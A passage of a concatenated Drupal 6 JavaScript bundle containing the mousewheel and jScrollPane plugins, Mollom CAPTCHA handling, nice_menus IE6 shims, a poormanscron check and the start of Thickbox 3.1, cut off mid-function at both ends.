    }
    else {
      var message = Drupal.t("An error occurred. \n@uri\n(no information available).", {'@uri': uri, '@text': xmlhttp.responseText });
    }
  }
  else {
    var message = Drupal.t("An HTTP error @status occurred. \n@uri", {'@uri': uri, '@status': xmlhttp.status });
  }
  return message;
}

// Global Killswitch on the <html> element
if (Drupal.jsEnabled) {
  // Global Killswitch on the <html> element
  $(document.documentElement).addClass('js');
  // 'js enabled' cookie
  document.cookie = 'has_js=1; path=/';
  // Attach all behaviors.
  $(document).ready(function() {
    Drupal.attachBehaviors(this);
  });
}

/**
 * The default themes.
 */
Drupal.theme.prototype = {

  /**
   * Formats text for emphasized display in a placeholder inside a sentence.
   *
   * @param str
   *   The text to format (plain-text).
   * @return
   *   The formatted text (html).
   */
  placeholder: function(str) {
    return '<em>' + Drupal.checkPlain(str) + '</em>';
  }
};
;
/*! Copyright (c) 2010 Brandon Aaron (http://brandonaaron.net)
 * Licensed under the MIT License (LICENSE.txt).
 *
 * Thanks to: http://adomas.org/javascript-mouse-wheel/ for some pointers.
 * Thanks to: Mathias Bank(http://www.mathias-bank.de) for a scope bug fix.
 * Thanks to: Seamus Leahy for adding deltaX and deltaY
 *
 * Version: 3.0.4
 * 
 * Requires: 1.2.2+
 */

(function($) {

var types = ['DOMMouseScroll', 'mousewheel'];

$.event.special.mousewheel = {
    setup: function() {
        if ( this.addEventListener ) {
            for ( var i=types.length; i; ) {
                this.addEventListener( types[--i], handler, false );
            }
        } else {
            this.onmousewheel = handler;
        }
    },
    
    teardown: function() {
        if ( this.removeEventListener ) {
            for ( var i=types.length; i; ) {
                this.removeEventListener( types[--i], handler, false );
            }
        } else {
            this.onmousewheel = null;
        }
    }
};

$.fn.extend({
    mousewheel: function(fn) {
        return fn ? this.bind("mousewheel", fn) : this.trigger("mousewheel");
    },
    
    unmousewheel: function(fn) {
        return this.unbind("mousewheel", fn);
    }
});


function handler(event) {
    var orgEvent = event || window.event, args = [].slice.call( arguments, 1 ), delta = 0, returnValue = true, deltaX = 0, deltaY = 0;
    event = $.event.fix(orgEvent);
    event.type = "mousewheel";
    
    // Old school scrollwheel delta
    if ( event.wheelDelta ) { delta = event.wheelDelta/120; }
    if ( event.detail     ) { delta = -event.detail/3; }
    
    // New school multidimensional scroll (touchpads) deltas
    deltaY = delta;
    
    // Gecko
    if ( orgEvent.axis !== undefined && orgEvent.axis === orgEvent.HORIZONTAL_AXIS ) {
        deltaY = 0;
        deltaX = -1*delta;
    }
    
    // Webkit
    if ( orgEvent.wheelDeltaY !== undefined ) { deltaY = orgEvent.wheelDeltaY/120; }
    if ( orgEvent.wheelDeltaX !== undefined ) { deltaX = -1*orgEvent.wheelDeltaX/120; }
    
    // Add event and delta to the front of the arguments
    args.unshift(event, delta, deltaX, deltaY);
    
    return $.event.handle.apply(this, args);
}

})(jQuery);;
/*
 * jScrollPane - v2.0.0beta9 - 2011-02-04
 * http://jscrollpane.kelvinluck.com/
 *
 * Copyright (c) 2010 Kelvin Luck
 * Dual licensed under the MIT and GPL licenses.
 */
(function(b,a,c){b.fn.jScrollPane=function(f){function d(D,N){var ay,P=this,X,aj,w,al,S,Y,z,r,az,aE,au,j,I,i,k,Z,T,ap,W,u,B,aq,ae,am,G,m,at,ax,y,av,aH,g,K,ai=true,O=true,aG=false,l=false,ao=D.clone(false,false).empty(),ab=b.fn.mwheelIntent?"mwheelIntent.jsp":"mousewheel.jsp";aH=D.css("paddingTop")+" "+D.css("paddingRight")+" "+D.css("paddingBottom")+" "+D.css("paddingLeft");g=(parseInt(D.css("paddingLeft"),10)||0)+(parseInt(D.css("paddingRight"),10)||0);function ar(aQ){var aO,aP,aK,aM,aL,aJ,aI,aN;ay=aQ;if(X===c){aI=D.scrollTop();aN=D.scrollLeft();D.css({overflow:"hidden",padding:0});aj=D.innerWidth()+g;w=D.innerHeight();D.width(aj);X=b('<div class="jspPane" />').css("padding",aH).append(D.children());al=b('<div class="jspContainer" />').css({width:aj+"px",height:w+"px"}).append(X).appendTo(D)}else{D.css("width","");aJ=D.innerWidth()+g!=aj||D.outerHeight()!=w;if(aJ){aj=D.innerWidth()+g;w=D.innerHeight();al.css({width:aj+"px",height:w+"px"})}if(!aJ&&K==S&&X.outerHeight()==Y){D.width(aj);return}K=S;X.css("width","");D.width(aj);al.find(">.jspVerticalBar,>.jspHorizontalBar").remove().end()}aO=X.clone(false,false).css("position","absolute");aP=b('<div style="width:1px; position: relative;" />').append(aO);b("body").append(aP);S=Math.max(X.outerWidth(),aO.outerWidth());aP.remove();Y=X.outerHeight();z=S/aj;r=Y/w;az=r>1;aE=z>1;if(!(aE||az)){D.removeClass("jspScrollable");X.css({top:0,width:al.width()-g});o();E();Q();x();ah()}else{D.addClass("jspScrollable");aK=ay.maintainPosition&&(I||Z);if(aK){aM=aC();aL=aA()}aF();A();F();if(aK){M(aM,false);L(aL,false)}J();af();an();if(ay.enableKeyboardNavigation){R()}if(ay.clickOnTrack){q()}C();if(ay.hijackInternalLinks){n()}}if(ay.autoReinitialise&&!av){av=setInterval(function(){ar(ay)},ay.autoReinitialiseDelay)}else{if(!ay.autoReinitialise&&av){clearInterval(av)}}aI&&D.scrollTop(0)&&L(aI,false);aN&&D.scrollLeft(0)&&M(aN,false);D.trigger("jsp-initialised",[aE||az])}function aF(){if(az){al.append(b('<div class="jspVerticalBar" />').append(b('<div class="jspCap jspCapTop" />'),b('<div class="jspTrack" />').append(b('<div class="jspDrag" />').append(b('<div class="jspDragTop" />'),b('<div class="jspDragBottom" />'))),b('<div class="jspCap jspCapBottom" />')));T=al.find(">.jspVerticalBar");ap=T.find(">.jspTrack");au=ap.find(">.jspDrag");if(ay.showArrows){aq=b('<a class="jspArrow jspArrowUp" />').bind("mousedown.jsp",aD(0,-1)).bind("click.jsp",aB);ae=b('<a class="jspArrow jspArrowDown" />').bind("mousedown.jsp",aD(0,1)).bind("click.jsp",aB);if(ay.arrowScrollOnHover){aq.bind("mouseover.jsp",aD(0,-1,aq));ae.bind("mouseover.jsp",aD(0,1,ae))}ak(ap,ay.verticalArrowPositions,aq,ae)}u=w;al.find(">.jspVerticalBar>.jspCap:visible,>.jspVerticalBar>.jspArrow").each(function(){u-=b(this).outerHeight()});au.hover(function(){au.addClass("jspHover")},function(){au.removeClass("jspHover")}).bind("mousedown.jsp",function(aI){b("html").bind("dragstart.jsp selectstart.jsp",aB);au.addClass("jspActive");var s=aI.pageY-au.position().top;b("html").bind("mousemove.jsp",function(aJ){U(aJ.pageY-s,false)}).bind("mouseup.jsp mouseleave.jsp",aw);return false});p()}}function p(){ap.height(u+"px");I=0;W=ay.verticalGutter+ap.outerWidth();X.width(aj-W-g);if(T.position().left===0){X.css("margin-left",W+"px")}}function A(){if(aE){al.append(b('<div class="jspHorizontalBar" />').append(b('<div class="jspCap jspCapLeft" />'),b('<div class="jspTrack" />').append(b('<div class="jspDrag" />').append(b('<div class="jspDragLeft" />'),b('<div class="jspDragRight" />'))),b('<div class="jspCap jspCapRight" />')));am=al.find(">.jspHorizontalBar");G=am.find(">.jspTrack");i=G.find(">.jspDrag");if(ay.showArrows){ax=b('<a class="jspArrow jspArrowLeft" />').bind("mousedown.jsp",aD(-1,0)).bind("click.jsp",aB);y=b('<a class="jspArrow jspArrowRight" />').bind("mousedown.jsp",aD(1,0)).bind("click.jsp",aB);
if(ay.arrowScrollOnHover){ax.bind("mouseover.jsp",aD(-1,0,ax));y.bind("mouseover.jsp",aD(1,0,y))}ak(G,ay.horizontalArrowPositions,ax,y)}i.hover(function(){i.addClass("jspHover")},function(){i.removeClass("jspHover")}).bind("mousedown.jsp",function(aI){b("html").bind("dragstart.jsp selectstart.jsp",aB);i.addClass("jspActive");var s=aI.pageX-i.position().left;b("html").bind("mousemove.jsp",function(aJ){V(aJ.pageX-s,false)}).bind("mouseup.jsp mouseleave.jsp",aw);return false});m=al.innerWidth();ag()}}function ag(){al.find(">.jspHorizontalBar>.jspCap:visible,>.jspHorizontalBar>.jspArrow").each(function(){m-=b(this).outerWidth()});G.width(m+"px");Z=0}function F(){if(aE&&az){var aI=G.outerHeight(),s=ap.outerWidth();u-=aI;b(am).find(">.jspCap:visible,>.jspArrow").each(function(){m+=b(this).outerWidth()});m-=s;w-=s;aj-=aI;G.parent().append(b('<div class="jspCorner" />').css("width",aI+"px"));p();ag()}if(aE){X.width((al.outerWidth()-g)+"px")}Y=X.outerHeight();r=Y/w;if(aE){at=Math.ceil(1/z*m);if(at>ay.horizontalDragMaxWidth){at=ay.horizontalDragMaxWidth}else{if(at<ay.horizontalDragMinWidth){at=ay.horizontalDragMinWidth}}i.width(at+"px");k=m-at;ad(Z)}if(az){B=Math.ceil(1/r*u);if(B>ay.verticalDragMaxHeight){B=ay.verticalDragMaxHeight}else{if(B<ay.verticalDragMinHeight){B=ay.verticalDragMinHeight}}au.height(B+"px");j=u-B;ac(I)}}function ak(aJ,aL,aI,s){var aN="before",aK="after",aM;if(aL=="os"){aL=/Mac/.test(navigator.platform)?"after":"split"}if(aL==aN){aK=aL}else{if(aL==aK){aN=aL;aM=aI;aI=s;s=aM}}aJ[aN](aI)[aK](s)}function aD(aI,s,aJ){return function(){H(aI,s,this,aJ);this.blur();return false}}function H(aL,aK,aO,aN){aO=b(aO).addClass("jspActive");var aM,aJ,aI=true,s=function(){if(aL!==0){P.scrollByX(aL*ay.arrowButtonSpeed)}if(aK!==0){P.scrollByY(aK*ay.arrowButtonSpeed)}aJ=setTimeout(s,aI?ay.initialDelay:ay.arrowRepeatFreq);aI=false};s();aM=aN?"mouseout.jsp":"mouseup.jsp";aN=aN||b("html");aN.bind(aM,function(){aO.removeClass("jspActive");aJ&&clearTimeout(aJ);aJ=null;aN.unbind(aM)})}function q(){x();if(az){ap.bind("mousedown.jsp",function(aN){if(aN.originalTarget===c||aN.originalTarget==aN.currentTarget){var aL=b(this),aO=aL.offset(),aM=aN.pageY-aO.top-I,aJ,aI=true,s=function(){var aR=aL.offset(),aS=aN.pageY-aR.top-B/2,aP=w*ay.scrollPagePercent,aQ=j*aP/(Y-w);if(aM<0){if(I-aQ>aS){P.scrollByY(-aP)}else{U(aS)}}else{if(aM>0){if(I+aQ<aS){P.scrollByY(aP)}else{U(aS)}}else{aK();return}}aJ=setTimeout(s,aI?ay.initialDelay:ay.trackClickRepeatFreq);aI=false},aK=function(){aJ&&clearTimeout(aJ);aJ=null;b(document).unbind("mouseup.jsp",aK)};s();b(document).bind("mouseup.jsp",aK);return false}})}if(aE){G.bind("mousedown.jsp",function(aN){if(aN.originalTarget===c||aN.originalTarget==aN.currentTarget){var aL=b(this),aO=aL.offset(),aM=aN.pageX-aO.left-Z,aJ,aI=true,s=function(){var aR=aL.offset(),aS=aN.pageX-aR.left-at/2,aP=aj*ay.scrollPagePercent,aQ=k*aP/(S-aj);if(aM<0){if(Z-aQ>aS){P.scrollByX(-aP)}else{V(aS)}}else{if(aM>0){if(Z+aQ<aS){P.scrollByX(aP)}else{V(aS)}}else{aK();return}}aJ=setTimeout(s,aI?ay.initialDelay:ay.trackClickRepeatFreq);aI=false},aK=function(){aJ&&clearTimeout(aJ);aJ=null;b(document).unbind("mouseup.jsp",aK)};s();b(document).bind("mouseup.jsp",aK);return false}})}}function x(){if(G){G.unbind("mousedown.jsp")}if(ap){ap.unbind("mousedown.jsp")}}function aw(){b("html").unbind("dragstart.jsp selectstart.jsp mousemove.jsp mouseup.jsp mouseleave.jsp");if(au){au.removeClass("jspActive")}if(i){i.removeClass("jspActive")}}function U(s,aI){if(!az){return}if(s<0){s=0}else{if(s>j){s=j}}if(aI===c){aI=ay.animateScroll}if(aI){P.animate(au,"top",s,ac)}else{au.css("top",s);ac(s)}}function ac(aI){if(aI===c){aI=au.position().top}al.scrollTop(0);I=aI;var aL=I===0,aJ=I==j,aK=aI/j,s=-aK*(Y-w);if(ai!=aL||aG!=aJ){ai=aL;aG=aJ;D.trigger("jsp-arrow-change",[ai,aG,O,l])}v(aL,aJ);X.css("top",s);D.trigger("jsp-scroll-y",[-s,aL,aJ]).trigger("scroll")}function V(aI,s){if(!aE){return}if(aI<0){aI=0}else{if(aI>k){aI=k}}if(s===c){s=ay.animateScroll}if(s){P.animate(i,"left",aI,ad)
}else{i.css("left",aI);ad(aI)}}function ad(aI){if(aI===c){aI=i.position().left}al.scrollTop(0);Z=aI;var aL=Z===0,aK=Z==k,aJ=aI/k,s=-aJ*(S-aj);if(O!=aL||l!=aK){O=aL;l=aK;D.trigger("jsp-arrow-change",[ai,aG,O,l])}t(aL,aK);X.css("left",s);D.trigger("jsp-scroll-x",[-s,aL,aK]).trigger("scroll")}function v(aI,s){if(ay.showArrows){aq[aI?"addClass":"removeClass"]("jspDisabled");ae[s?"addClass":"removeClass"]("jspDisabled")}}function t(aI,s){if(ay.showArrows){ax[aI?"addClass":"removeClass"]("jspDisabled");y[s?"addClass":"removeClass"]("jspDisabled")}}function L(s,aI){var aJ=s/(Y-w);U(aJ*j,aI)}function M(aI,s){var aJ=aI/(S-aj);V(aJ*k,s)}function aa(aU,aP,aJ){var aN,aK,aL,s=0,aT=0,aI,aO,aR,aQ,aS;try{aN=b(aU)}catch(aM){return}aK=aN.outerHeight();aL=aN.outerWidth();al.scrollTop(0);al.scrollLeft(0);while(!aN.is(".jspPane")){s+=aN.position().top;aT+=aN.position().left;aN=aN.offsetParent();if(/^body|html$/i.test(aN[0].nodeName)){return}}aI=aA();aO=aI+w;if(s<aI||aP){aQ=s-ay.verticalGutter}else{if(s+aK>aO){aQ=s-w+aK+ay.verticalGutter}}if(aQ){L(aQ,aJ)}viewportLeft=aC();aR=viewportLeft+aj;if(aT<viewportLeft||aP){aS=aT-ay.horizontalGutter}else{if(aT+aL>aR){aS=aT-aj+aL+ay.horizontalGutter}}if(aS){M(aS,aJ)}}function aC(){return -X.position().left}function aA(){return -X.position().top}function af(){al.unbind(ab).bind(ab,function(aL,aM,aK,aI){var aJ=Z,s=I;P.scrollBy(aK*ay.mouseWheelSpeed,-aI*ay.mouseWheelSpeed,false);return aJ==Z&&s==I})}function o(){al.unbind(ab)}function aB(){return false}function J(){X.find(":input,a").unbind("focus.jsp").bind("focus.jsp",function(s){aa(s.target,false)})}function E(){X.find(":input,a").unbind("focus.jsp")}function R(){var s,aI;X.focus(function(){D.focus()});D.attr("tabindex",0).unbind("keydown.jsp keypress.jsp").bind("keydown.jsp",function(aM){if(aM.target!==this){return}var aL=Z,aK=I;switch(aM.keyCode){case 40:case 38:case 34:case 32:case 33:case 39:case 37:s=aM.keyCode;aJ();break;case 35:L(Y-w);s=null;break;case 36:L(0);s=null;break}aI=aM.keyCode==s&&aL!=Z||aK!=I;return !aI}).bind("keypress.jsp",function(aK){if(aK.keyCode==s){aJ()}return !aI});if(ay.hideFocus){D.css("outline","none");if("hideFocus" in al[0]){D.attr("hideFocus",true)}}else{D.css("outline","");if("hideFocus" in al[0]){D.attr("hideFocus",false)}}function aJ(){var aL=Z,aK=I;switch(s){case 40:P.scrollByY(ay.keyboardSpeed,false);break;case 38:P.scrollByY(-ay.keyboardSpeed,false);break;case 34:case 32:P.scrollByY(w*ay.scrollPagePercent,false);break;case 33:P.scrollByY(-w*ay.scrollPagePercent,false);break;case 39:P.scrollByX(ay.keyboardSpeed,false);break;case 37:P.scrollByX(-ay.keyboardSpeed,false);break}aI=aL!=Z||aK!=I;return aI}}function Q(){D.attr("tabindex","-1").removeAttr("tabindex").unbind("keydown.jsp keypress.jsp")}function C(){if(location.hash&&location.hash.length>1){var aJ,aI;try{aJ=b(location.hash)}catch(s){return}if(aJ.length&&X.find(location.hash)){if(al.scrollTop()===0){aI=setInterval(function(){if(al.scrollTop()>0){aa(location.hash,true);b(document).scrollTop(al.position().top);clearInterval(aI)}},50)}else{aa(location.hash,true);b(document).scrollTop(al.position().top)}}}}function ah(){b("a.jspHijack").unbind("click.jsp-hijack").removeClass("jspHijack")}function n(){ah();b("a[href^=#]").addClass("jspHijack").bind("click.jsp-hijack",function(){var s=this.href.split("#"),aI;if(s.length>1){aI=s[1];if(aI.length>0&&X.find("#"+aI).length>0){aa("#"+aI,true);return false}}})}function an(){var aJ,aI,aL,aK,aM,s=false;al.unbind("touchstart.jsp touchmove.jsp touchend.jsp click.jsp-touchclick").bind("touchstart.jsp",function(aN){var aO=aN.originalEvent.touches[0];aJ=aC();aI=aA();aL=aO.pageX;aK=aO.pageY;aM=false;s=true}).bind("touchmove.jsp",function(aQ){if(!s){return}var aP=aQ.originalEvent.touches[0],aO=Z,aN=I;P.scrollTo(aJ+aL-aP.pageX,aI+aK-aP.pageY);aM=aM||Math.abs(aL-aP.pageX)>5||Math.abs(aK-aP.pageY)>5;return aO==Z&&aN==I}).bind("touchend.jsp",function(aN){s=false}).bind("click.jsp-touchclick",function(aN){if(aM){aM=false;return false}})}function h(){var s=aA(),aI=aC();
D.removeClass("jspScrollable").unbind(".jsp");D.replaceWith(ao.append(X.children()));ao.scrollTop(s);ao.scrollLeft(aI)}b.extend(P,{reinitialise:function(aI){aI=b.extend({},ay,aI);ar(aI)},scrollToElement:function(aJ,aI,s){aa(aJ,aI,s)},scrollTo:function(aJ,s,aI){M(aJ,aI);L(s,aI)},scrollToX:function(aI,s){M(aI,s)},scrollToY:function(s,aI){L(s,aI)},scrollToPercentX:function(aI,s){M(aI*(S-aj),s)},scrollToPercentY:function(aI,s){L(aI*(Y-w),s)},scrollBy:function(aI,s,aJ){P.scrollByX(aI,aJ);P.scrollByY(s,aJ)},scrollByX:function(s,aJ){var aI=aC()+s,aK=aI/(S-aj);V(aK*k,aJ)},scrollByY:function(s,aJ){var aI=aA()+s,aK=aI/(Y-w);U(aK*j,aJ)},positionDragX:function(s,aI){V(s,aI)},positionDragY:function(aI,s){V(aI,s)},animate:function(aI,aL,s,aK){var aJ={};aJ[aL]=s;aI.animate(aJ,{duration:ay.animateDuration,ease:ay.animateEase,queue:false,step:aK})},getContentPositionX:function(){return aC()},getContentPositionY:function(){return aA()},getContentWidth:function(){return S()},getContentHeight:function(){return Y()},getPercentScrolledX:function(){return aC()/(S-aj)},getPercentScrolledY:function(){return aA()/(Y-w)},getIsScrollableH:function(){return aE},getIsScrollableV:function(){return az},getContentPane:function(){return X},scrollToBottom:function(s){U(j,s)},hijackInternalLinks:function(){n()},destroy:function(){h()}});ar(N)}f=b.extend({},b.fn.jScrollPane.defaults,f);b.each(["mouseWheelSpeed","arrowButtonSpeed","trackClickSpeed","keyboardSpeed"],function(){f[this]=f[this]||f.speed});var e;this.each(function(){var g=b(this),h=g.data("jsp");if(h){h.reinitialise(f)}else{h=new d(g,f);g.data("jsp",h)}e=e?e.add(g):g});return e};b.fn.jScrollPane.defaults={showArrows:false,maintainPosition:true,clickOnTrack:true,autoReinitialise:false,autoReinitialiseDelay:500,verticalDragMinHeight:0,verticalDragMaxHeight:99999,horizontalDragMinWidth:0,horizontalDragMaxWidth:99999,animateScroll:false,animateDuration:300,animateEase:"linear",hijackInternalLinks:false,verticalGutter:4,horizontalGutter:4,mouseWheelSpeed:0,arrowButtonSpeed:0,arrowRepeatFreq:50,arrowScrollOnHover:false,trackClickSpeed:0,trackClickRepeatFreq:70,verticalArrowPositions:"split",horizontalArrowPositions:"split",enableKeyboardNavigation:true,hideFocus:false,keyboardSpeed:0,initialDelay:300,speed:30,scrollPagePercent:0.8}})(jQuery,this);;
$(function(){

    // this initialises the scollpanes on the page.
    $('.scroll-pane').jScrollPane(
        {
            scrollbarWidth:20,
            scrollbarMargin:10,
            verticalDragMinHeight: 25,
            verticalDragMaxHeight: 25

        }
    );
});;
(function ($) {

/**
 * Open Mollom privacy policy link in a new window.
 *
 * Required for valid XHTML Strict markup.
 */
Drupal.behaviors.mollomPrivacy = function (context) {
  $('.mollom-privacy a', context).click(function () {
    this.target = '_blank';
  });
};

/**
 * Attach click event handlers for CAPTCHA links.
 */
Drupal.behaviors.mollomCaptcha = function (context) {
  $('a.mollom-switch-captcha', context).click(getMollomCaptcha);
};

/**
 * Fetch a Mollom CAPTCHA and output the image or audio into the form.
 */
function getMollomCaptcha() {
  // Get the current requested CAPTCHA type from the clicked link.
  var newCaptchaType = $(this).hasClass('mollom-audio-captcha') ? 'audio' : 'image';

  var context = $(this).parents('form');

  // Extract the Mollom session id from the form.
  var mollomSessionId = $('input.mollom-session-id', context).val();

  // Retrieve a CAPTCHA:
  $.getJSON(Drupal.settings.basePath + 'mollom/captcha/' + newCaptchaType + '/' + mollomSessionId,
    function (data) {
      if (!(data && data.content)) {
        return;
      }
      // Inject new CAPTCHA.
      $('.mollom-captcha-content', context).parent().html(data.content);
      // Update session id.
      $('input.mollom-session-id', context).val(data.session_id);
      // Add an onclick-event handler for the new link.
      Drupal.attachBehaviors(context);
      // Focus on the CATPCHA input.
      $('input[name="mollom[captcha]"]', context).focus();
    }
  );
  return false;
}

})(jQuery);
;
// $Id: nice_menus.js,v 1.10.2.6 2008/08/04 23:45:51 add1sun Exp $

// We need to do some browser sniffing to weed out IE 6 only
// because only IE6 needs this hover hack.
if (document.all && !window.opera && (navigator.appVersion.search("MSIE 6.0") != -1) && $.browser.msie) {
  function IEHoverPseudo() {
      $("ul.nice-menu li.menuparent").hover(function(){
          $(this).addClass("over").find("> ul").show().addShim();
        },function(){
          $(this).removeClass("over").find("> ul").removeShim().hide();
        }
      );
      // Add a hover class to all li for CSS styling. Silly naming is done
      // so we don't break CSS compatibility for .over class already in use
      // and due to the fact that IE6 doesn't understand multiple selectors.
      $("ul.nice-menu li").hover(function(){
          $(this).addClass("ie-over");
        },function(){
          $(this).removeClass("ie-over");
        }
      );
    }

    // This is the jquery method of adding a function
    // to the BODY onload event.  (See jquery.com)
    $(document).ready(function(){ IEHoverPseudo() });
}

$.fn.addShim = function() {
  return this.each(function(){
	  if(document.all && $("select").size() > 0) {
	    var ifShim = document.createElement('iframe');
	    ifShim.src = "javascript:false";
			ifShim.style.width=$(this).width()+1+"px";
      ifShim.style.height=$(this).find("> li").size()*23+20+"px";
			ifShim.style.filter="progid:DXImageTransform.Microsoft.Alpha(style=0,opacity=0)";
		  ifShim.style.zIndex="0";
    $(this).prepend(ifShim);
      $(this).css("zIndex","99");
		}
	});
};

$.fn.removeShim = function() {
  return this.each(function(){
	  if (document.all) $("iframe", this).remove();
	});
};
;
// $Id: poormanscron.js,v 1.1.2.3 2010/01/17 00:27:52 davereid Exp $
(function ($) {

/**
 * Checks to see if the cron should be automatically run.
 */
Drupal.behaviors.cronCheck = function(context) {
  if (Drupal.settings.cron.runNext || false) {
    $('body:not(.cron-check-processed)', context).addClass('cron-check-processed').each(function() {
      // Only execute the cron check if its the right time.
      if (Math.round(new Date().getTime() / 1000.0) >= Drupal.settings.cron.runNext) {
        $.get(Drupal.settings.cron.basePath + '/run-cron-check');
      }
    });
  }
};

})(jQuery);
;
// $Id: thickbox.js,v 1.8.2.19 2010/03/09 07:10:48 frjo Exp $

/*
 * Thickbox 3.1 - One Box To Rule Them All.
 * By Cody Lindley (http://www.codylindley.com)
 * Copyright (c) 2007 cody lindley
 * Licensed under the MIT License: http://www.opensource.org/licenses/mit-license.php
*/


// Initialize Thickbox.
Drupal.behaviors.initThickbox = function (context) {
  $('a,area,input', context).filter('.thickbox:not(.initThickbox-processed)').addClass('initThickbox-processed').click(function() {
    var t = this.title || this.name || null;
    var a = this.href || this.alt;
    var g = this.rel || false;
    tb_show(t,a,g);
    this.blur();
    return false;
  });
};

function tb_show(caption, url, imageGroup) { //function called when the user clicks on a thickbox link

  var settings = Drupal.settings.thickbox;
  tb_setBrowserExtra();

  try {
    if (typeof document.body.style.maxHeight === 'undefined') { //if IE 6
      $('body','html').css({height: '100%', width: '100%'});
      $('html').css('overflow','hidden');
      if (document.getElementById('TB_HideSelect') === null) { //iframe to hide select elements in ie6
        $('body').append('<iframe id="TB_HideSelect"></iframe><div id="TB_overlay"></div><div id="TB_window"></div>');
        $('#TB_overlay').click(tb_remove);
      }
    }
    else { //all others
      if (document.getElementById('TB_overlay') === null) {
        $('body').append('<div id="TB_overlay"></div><div id="TB_window"></div>');
        $('#TB_overlay').click(tb_remove);
      }
    }

    if ($.browserextra.macfirefox) {
      $('#TB_overlay').addClass('TB_overlayMacFFBGHack'); //use png overlay so hide flash
    }
    else {
      $('#TB_overlay').addClass('TB_overlayBG'); //use background and opacity
    }

    if (caption === null) {
      caption = '';
    }
    $('body').append('<div id="TB_load"></div>'); //add loader to the page
    $('#TB_load').show(); //show loader

    var baseURL;
    if (url.indexOf('?')!==-1) { //ff there is a query string involved
      baseURL = url.substr(0, url.indexOf('?'));
    }
    else {
      baseURL = url;
    }

    var urlString = /\.jpg$|\.jpeg$|\.png$|\.gif$|\.bmp$/;
    var urlType = baseURL.toLowerCase().match(urlString);

    if (urlType == '.jpg' || urlType == '.jpeg' || urlType == '.png' || urlType == '.gif' || urlType == '.bmp') { //code to show images
      TB_PrevCaption = '';
      TB_PrevURL = '';
      TB_PrevHTML = '';
      TB_NextCaption = '';
      TB_NextURL = '';
      TB_NextHTML = '';
      TB_imageCount = '';
      TB_FoundURL = false;
      if (imageGroup) {
        TB_TempArray = $('a[rel=' + imageGroup + ']').get();
        for (TB_Counter = 0; ((TB_Counter < TB_TempArray.length) && (TB_NextHTML === '')); TB_Counter++) {
          var urlTypeTemp = TB_TempArray[TB_Counter].href.toLowerCase().match(urlString);
          if (!(TB_TempArray[TB_Counter].href == url)) {
            if (TB_FoundURL) {
              TB_NextCaption = TB_TempArray[TB_Counter].title;
              TB_NextURL = TB_TempArray[TB_Counter].href;
              TB_NextHTML = '<span id="TB_next">&nbsp;&nbsp;<a href="#">' + settings.next + '</a></span>';
            }
            else {
              TB_PrevCaption = TB_TempArray[TB_Counter].title;
              TB_PrevURL = TB_TempArray[TB_Counter].href;
              TB_PrevHTML = '<span id="TB_prev">&nbsp;&nbsp;<a href="#">' + settings.prev + '</a></span>';
            }
          }
          else {
            TB_FoundURL = true;
            if (TB_TempArray.length > 1) { // Don't show "Image 1 of 1".
              TB_imageCount = settings.image_count.replace(/\!current/, (TB_Counter + 1)).replace(/\!total/, TB_TempArray.length);
            }
          }
        }
      }

      // Modified to preload previous and next image.
      imgPreloader = new Image();
      prevImg = new Image();
      nextImg = new Image();
      imgPreloader.onload = function() {
        imgPreloader.onload = null;

        var TB_Links = $('a[class*="thickbox"]');
        var i = -1;
        TB_Links.each(function(n) { if (this.href == imgPreloader.src) { i = n; } });
        if (i != -1) {
          if (i > 0) { prevImg.src = TB_Links[i - 1].href; }
          if (i + 1 < TB_Links.length) { nextImg.src = TB_Links[i + 1].href; }
        }

        // Resizing large images - orginal by Christian Montoya edited by me.
        var pagesize = tb_getPageSize();
        var x = pagesize[0] - 100;
        var y = pagesize[1] - 100;
        var imageWidth = imgPreloader.width;
        var imageHeight = imgPreloader.height;
        if (imageWidth > x) {
          imageHeight = imageHeight * (x / imageWidth);
          imageWidth = x;
          if (imageHeight > y) {
            imageWidth = imageWidth * (y / imageHeight);
            imageHeight = y;
          }
        }
        else if (imageHeight > y) {
          imageWidth = imageWidth * (y / imageHeight);
          imageHeight = y;
          if (imageWidth > x) {
            imageHeight = imageHeight * (x / imageWidth);
            imageWidth = x;
          }
        }
        // End Resizing

        TB_WIDTH = imageWidth < 320 ? 350 : imageWidth + 30;
        TB_HEIGHT = imageHeight + 60;
        $('#TB_window').append('<a href="" id="TB_ImageOff" title="' + settings.next_close + '"><img id="TB_Image" src="' + url + '" width="' + imageWidth + '" height="' + imageHeight + '" alt="' + caption + '" /></a><div id="TB_caption">' + caption + '<div id="TB_secondLine">' + TB_imageCount + TB_PrevHTML + TB_NextHTML + '</div></div><div id="TB_closeWindow"><a href="#" id="TB_closeWindowButton" title="' + settings.close + '">' + settings.close + '</a> ' + settings.esc_key + '</div>');
        $('#TB_closeWindowButton').click(tb_remove);

        if (!(TB_PrevHTML === '')) {
          function goPrev() {
            if ($(document).unbind('click',goPrev)) {$(document).unbind('click',goPrev);}
            $('#TB_window').remove();
            $('body').append('<div id="TB_window"></div>');
            tb_show(TB_PrevCaption, TB_PrevURL, imageGroup);
            return false;
          }
          $('#TB_prev').click(goPrev);
        }

        if (!(TB_NextHTML === '')) {
          function goNext() {
            $('#TB_window').remove();
            $('body').append('<div id="TB_window"></div>');
            tb_show(TB_NextCaption, TB_NextURL, imageGroup);
            return false;
          }
          $('#TB_next').click(goNext);
          $('#TB_ImageOff').click(goNext);
        }
        else {
          $('#TB_ImageOff').click(tb_remove);
        }

        document.onkeydown = function(e) {
          if (e == null) { // ie
            keycode = event.keyCode;
            escapeKey = 27;
          }
          else if ($.browser.safari || $.browser.opera) { // safari or opera
            keycode = e.which;
            escapeKey = 27;
          }
          else { // mozilla
            keycode = e.keyCode;
            escapeKey = e.DOM_VK_ESCAPE;
          }
          key = String.fromCharCode(keycode).toLowerCase();
          if (key == 'x' || key == 'c' || keycode == escapeKey) { // close
            tb_remove();
          }
          else if (key == 'n' || keycode == 39) { // display previous image
            if (!(TB_NextHTML == '')) {
              document.onkeydown = '';
              goNext();
            }
          }
          else if (key == 'p' || keycode == 37) { // display next image
            if (!(TB_PrevHTML == '')) {
              document.onkeydown = '';
              goPrev();
            }
          }
        };

        tb_position();
        $('#TB_load').remove();
        $('#TB_window').css({display:'block', opacity: 0}).animate({opacity: 1}, 400); //for safari using css instead of show
      };

      imgPreloader.src = url;
    }
    else { //code to show html

      var queryString = url.replace(/^[^\?]+\??/,'');
      var params = tb_parseQuery( queryString );

      TB_WIDTH = (params['width']*1) + 30 || 630; //defaults to 630 if no paramaters were added to URL
      TB_HEIGHT = (params['height']*1) + 40 || 440; //defaults to 440 if no paramaters were added to URL
      ajaxContentW = TB_WIDTH - 30;
      ajaxContentH = TB_HEIGHT - 45;

